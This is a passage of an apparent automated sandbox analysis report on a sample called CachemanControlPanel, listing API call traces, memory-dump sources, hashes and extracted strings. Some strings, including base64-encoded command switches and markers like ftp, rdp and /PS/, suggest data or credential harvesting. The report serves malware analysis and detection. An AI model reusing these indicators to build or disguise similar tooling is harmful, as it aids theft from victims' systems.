                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$Text_logf$ColorCreateDeleteSelectwcslen$AlignCompatibleExtentFillModePoint32RectSectionStock_atan2fmemset
                                                        • String ID: (
                                                        • API String ID: 1946677379-3887548279
                                                        • Opcode ID: 8d1d3991b3ad8bc1875c61d0d534c60fef7dd16b0e0e635c8db770be3e24974f
                                                        • Instruction ID: 451dcdaa8748e6389e68b49eb2dc2becbb11f90dd46d1fce7bf54d39f17819e7
                                                        • Opcode Fuzzy Hash: 8d1d3991b3ad8bc1875c61d0d534c60fef7dd16b0e0e635c8db770be3e24974f
                                                        • Instruction Fuzzy Hash: 59919A71209355DFC320EF65E948A2FBBE8FF84700F414D2EF485A2262DB74D9648B5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: codecvt$??3@$FreeHeap
                                                        • String ID:
                                                        • API String ID: 1748457837-0
                                                        • Opcode ID: 5ee7a6a3cc168251f8d358bb8634df6ed69fad4beeb2f5d75fe98671a63071d6
                                                        • Instruction ID: 190b61ec59d6a314bba0a793155db7ebf6a27c18f3ba3e4e29e2e6f1d4dbbd65
                                                        • Opcode Fuzzy Hash: 5ee7a6a3cc168251f8d358bb8634df6ed69fad4beeb2f5d75fe98671a63071d6
                                                        • Instruction Fuzzy Hash: E4328F74A00218DFDB18DF54C594BDEBBB1BB88344F24819AE8096B391D779AEC5CF84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00420630: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,0040BBE4,00000000), ref: 00420661
                                                          • Part of subcall function 00420630: malloc.MSVCRT ref: 00420671
                                                          • Part of subcall function 00420630: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000), ref: 0042068B
                                                          • Part of subcall function 00420630: malloc.MSVCRT ref: 004206A0
                                                        • strcmp.MSVCRT ref: 0040BBF7
                                                        • strcmp.MSVCRT ref: 0040BC1A
                                                        • strcmp.MSVCRT ref: 0040BC38
                                                        • strcmp.MSVCRT ref: 0040BC56
                                                        • strcmp.MSVCRT ref: 0040BC74
                                                        • strcmp.MSVCRT ref: 0040BC92
                                                        • strcmp.MSVCRT ref: 0040BCB3
                                                        • strcmp.MSVCRT ref: 0040BCD4
                                                        • HeapAlloc.KERNEL32(00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00001000), ref: 0040BD14
                                                        • strncpy.MSVCRT ref: 0040BD26
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 0040BD49
                                                          • Part of subcall function 0040BA9C: strstr.MSVCRT ref: 0040BAA8
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040BD05
                                                        • /US/, xrefs: 0040BC50
                                                        • /PS/, xrefs: 0040BC6E
                                                        • /PT/, xrefs: 0040BCCE
                                                        • /AN/, xrefs: 0040BCAD
                                                        • /PM/, xrefs: 0040BC8C
                                                        • /PC/, xrefs: 0040BBF1
                                                        • /WS/, xrefs: 0040BC14
                                                        • /PO/, xrefs: 0040BC32
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strcmp$ByteCharHeapMultiWidemalloc$AllocFreestrncpystrstr
                                                        • String ID: /AN/$/PC/$/PM/$/PO/$/PS/$/PT/$/US/$/WS/$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1669209463-1270636949
                                                        • Opcode ID: eb2c9b37329305b6619bf9f0a9ffeb49130971a1b93d5a1f14a5509c20d9dcbe
                                                        • Instruction ID: 286bf1c7d78f5721acf62dd1ba4a318037c4de6c3b217ab86fdae707a63dc284
                                                        • Opcode Fuzzy Hash: eb2c9b37329305b6619bf9f0a9ffeb49130971a1b93d5a1f14a5509c20d9dcbe
                                                        • Instruction Fuzzy Hash: 6A4142721083466AE215AB65AC46E7B76ACEF81718F50083FF801B11D2EF3C994599AE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00430024,00000000,00000000,00000000,00430116,$C$C,00430116,?,00000000,00000000,?,L3Njb21tYSA=,00000000,00000008,00000000,.log), ref: 00406D6C
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                          • Part of subcall function 00411A76: HeapFree.KERNEL32(00000000,-00000018,00430D24,00000000,00411810,00430D24,?,?,?,004010B2,0000000C,00000001,00000007,00430D24,004338DC,00000000), ref: 00411AB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap$ExistsFilePath
                                                        • String ID: $C$C$$C$C$$C$C$.log$?gpp=$?p=$?pl=1$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY$L1Zpc2l0VGltZUZpbHRlclR5cGUgMiAvVmlzaXRUaW1lRmlsdGVyVmFsdWUgNiAvc2NvbW1hIA==$L3Njb21tYSA=$ftp$hst$ins$rdp
                                                        • API String ID: 1326849783-2552739294
                                                        • Opcode ID: cce5e528d5d44bf4fc5d0fa200c0480a0c1a16264767edbbd71277aa7389ef32
                                                        • Instruction ID: ef7ec449c7042876fab9e70802ac5068f39e00fa98b555098825a3abadb390b6
                                                        • Opcode Fuzzy Hash: cce5e528d5d44bf4fc5d0fa200c0480a0c1a16264767edbbd71277aa7389ef32
                                                        • Instruction Fuzzy Hash: 67C152B5504300BAD600BF62DD82A6F76EAEFC8708F50C93FB044A51A2DE3DDD91562E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetIconInfo.USER32(?,?), ref: 00428AD5
                                                          • Part of subcall function 00412DCF: GetObjectType.GDI32(?), ref: 00412DE9
                                                          • Part of subcall function 00412DCF: GetObjectW.GDI32(?,00000054,?), ref: 00412E05
                                                        • DeleteObject.GDI32(?), ref: 00428AF8
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00428B05
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00428B27
                                                        • memset.MSVCRT ref: 00428B3A
                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00428B7C
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00428B98
                                                        • DrawIconEx.USER32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000002), ref: 00428BB2
                                                        • SelectObject.GDI32(00000000,?), ref: 00428BBD
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00428BCA
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00428C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateIconSelect$CompatibleDeleteDrawInfoPixelSectionTypememset
                                                        • String ID: (
                                                        • API String ID: 3561727912-3887548279
                                                        • Opcode ID: 75454fec3c0dcf8d06d4278aa9ad02416addedc9ca9e634728a610f5dece0b2e
                                                        • Instruction ID: a34ab14a4423eb234f8afa27f93db3f83a5ca9dcec38ea9a156ea1a412bd32e7
                                                        • Opcode Fuzzy Hash: 75454fec3c0dcf8d06d4278aa9ad02416addedc9ca9e634728a610f5dece0b2e
                                                        • Instruction Fuzzy Hash: 62416EB120A314AFD7119F65DD84A6FBBE8EF88740F40482EF580D2220DB74DD518B66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00421558
                                                        • SelectObject.GDI32(00000000,?), ref: 00421569
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00421570
                                                        • GetObjectW.GDI32(?,00000018,?,?,?,00000000), ref: 0042158A
                                                        • memset.MSVCRT ref: 004215BC
                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00421607
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00421619
                                                        • BitBlt.GDI32(00000000,00000000,00000000,00000028,00000028,00000000,00000000,00000000,00CC0020), ref: 00421644
                                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 00421659
                                                        • SetBrushOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 00421666
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00421686
                                                        • DeleteDC.GDI32(00000000), ref: 004216A3
                                                        • DeleteDC.GDI32(00000000), ref: 004216AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CreateObject$CompatibleDeleteSelectStretch$BrushModeSectionmemset
                                                        • String ID: (
                                                        • API String ID: 1241336042-3887548279
                                                        • Opcode ID: 483f9741b7e97e59c4994ca989e201f32c77134c98c697970a7294df045b80e2
                                                        • Instruction ID: 663ffc12b3781deb1270b704fcbee70233a22c1baa6ab7ef341390dc88e8ab68
                                                        • Opcode Fuzzy Hash: 483f9741b7e97e59c4994ca989e201f32c77134c98c697970a7294df045b80e2
                                                        • Instruction Fuzzy Hash: 85418BB1608314BFD311AB60ED44F7FBBADEF98704F50182EF941922A0D7B49D449B6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetStockObject.GDI32(0000000D), ref: 0042101A
                                                        • SelectObject.GDI32(00000000,?), ref: 00421035
                                                        • DeleteObject.GDI32(?), ref: 0042104C
                                                        • GetTextExtentPoint32W.GDI32(00000000,0042F6F0,00000002,?), ref: 0042106B
                                                        • memset.MSVCRT ref: 00421098
                                                        • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 004210DD
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004210F4
                                                        • SelectObject.GDI32(?,00000000), ref: 0042111D
                                                        • DeleteObject.GDI32(?), ref: 0042112E
                                                        • SetBkMode.GDI32(?,00000002), ref: 00421142
                                                        • SetTextAlign.GDI32(?,00000000), ref: 00421150
                                                        • SetBkColor.GDI32(?,00000000), ref: 0042115E
                                                        • SetTextColor.GDI32(?,00FFFFFF), ref: 0042116F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$Text$ColorDeleteSelect$AlignCreateExtentModePoint32SectionStockmemset
                                                        • String ID: (
                                                        • API String ID: 2443382557-3887548279
                                                        • Opcode ID: 174cadc52f7eb31a479a1011d5b1988d87d7c35983f2bea53f31ef484db9c75b
                                                        • Instruction ID: 35469bf677930ac05a70dd70de18b3cde08c7604cd6c14a59225586b22c7b08c
                                                        • Opcode Fuzzy Hash: 174cadc52f7eb31a479a1011d5b1988d87d7c35983f2bea53f31ef484db9c75b
                                                        • Instruction Fuzzy Hash: FA414C75A00604EBDB219FA5DD09BEEBBB8FF88701F10442AF55AE22A0D774A941DB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042898A
                                                        • SelectObject.GDI32(00000000,?), ref: 004289A6
                                                        • GetTextMetricsW.GDI32(00000000,?), ref: 004289AE
                                                        • GetTextExtentPoint32W.GDI32(00000000,0042F728,00000001,?), ref: 004289CB
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004289E0
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004289F2
                                                        • SetBkMode.GDI32(00000000,00000002), ref: 004289F7
                                                        • SetTextAlign.GDI32(00000000,00000000), ref: 004289FF
                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00428A07
                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00428A13
                                                        • GetStockObject.GDI32(00000004), ref: 00428A37
                                                        • FillRect.USER32(00000000,?,00000000), ref: 00428A44
                                                        • TextOutW.GDI32(00000000,00000000,00000000,0042F728,00000001), ref: 00428A54
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00428A7A
                                                        • DeleteDC.GDI32(00000000), ref: 00428AA6
                                                        • DeleteObject.GDI32(00000000), ref: 00428AB2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Text$Object$ColorCompatibleCreateDeleteSelect$AlignBitmapExtentFillMetricsModePixelPoint32RectStock
                                                        • String ID:
                                                        • API String ID: 4164013142-0
                                                        • Opcode ID: d9da3921e475873fa00fa4b29398704d6578978569df4dfb7a87ce4c0e86c49a
                                                        • Instruction ID: 7bd7968b5c5ca07f02ab4ff7871987801383328132c855cdb7c62ff5ec3f1e07
                                                        • Opcode Fuzzy Hash: d9da3921e475873fa00fa4b29398704d6578978569df4dfb7a87ce4c0e86c49a
                                                        • Instruction Fuzzy Hash: AA3159B1205311AFD311DF68ED88A3F7BF8EF89B51F00042EF945D2250DB64D8059B6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042898A
                                                        • SelectObject.GDI32(00000000,?), ref: 004289A6
                                                        • GetTextMetricsW.GDI32(00000000,?), ref: 004289AE
                                                        • GetTextExtentPoint32W.GDI32(00000000,0042F728,00000001,?), ref: 004289CB
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004289E0
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004289F2
                                                        • SetBkMode.GDI32(00000000,00000002), ref: 004289F7
                                                        • SetTextAlign.GDI32(00000000,00000000), ref: 004289FF
                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00428A07
                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00428A13
                                                        • GetStockObject.GDI32(00000004), ref: 00428A37
                                                        • FillRect.USER32(00000000,?,00000000), ref: 00428A44
                                                        • TextOutW.GDI32(00000000,00000000,00000000,0042F728,00000001), ref: 00428A54
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00428A7A
                                                        • DeleteDC.GDI32(00000000), ref: 00428AA6
                                                        • DeleteObject.GDI32(00000000), ref: 00428AB2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Text$Object$ColorCompatibleCreateDeleteSelect$AlignBitmapExtentFillMetricsModePixelPoint32RectStock
                                                        • String ID:
                                                        • API String ID: 4164013142-0
                                                        • Opcode ID: c0a39278aeb1addf9fa0765cc1d9b15e75e2f932edea1d0c2a7986a4e82dc3be
                                                        • Instruction ID: 6ee40499ff3680907a5a3f1a74366b00b354716b642d065a4a1f32d3cdaed320
                                                        • Opcode Fuzzy Hash: c0a39278aeb1addf9fa0765cc1d9b15e75e2f932edea1d0c2a7986a4e82dc3be
                                                        • Instruction Fuzzy Hash: B73158B1345311AFD311DF68ED88A3F7BE8EF89B51F00042EF941D2250DBA8D8059B6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00413B86
                                                        • HeapAlloc.KERNEL32(00000008), ref: 00413C59
                                                        • HeapFree.KERNEL32(00000000,?), ref: 00413E03
                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00413E19
                                                          • Part of subcall function 004146E5: HeapAlloc.KERNEL32(00000008,00000450,?,?,?,?,?,?), ref: 00414704
                                                          • Part of subcall function 004146E5: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004147FA
                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00413EF1
                                                        • memcpy.MSVCRT ref: 00413F17
                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00413F6B
                                                        • memcpy.MSVCRT ref: 00413F80
                                                        • CloseHandle.KERNEL32(?), ref: 00413FB1
                                                        • DeleteFileW.KERNEL32(?), ref: 00413FBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
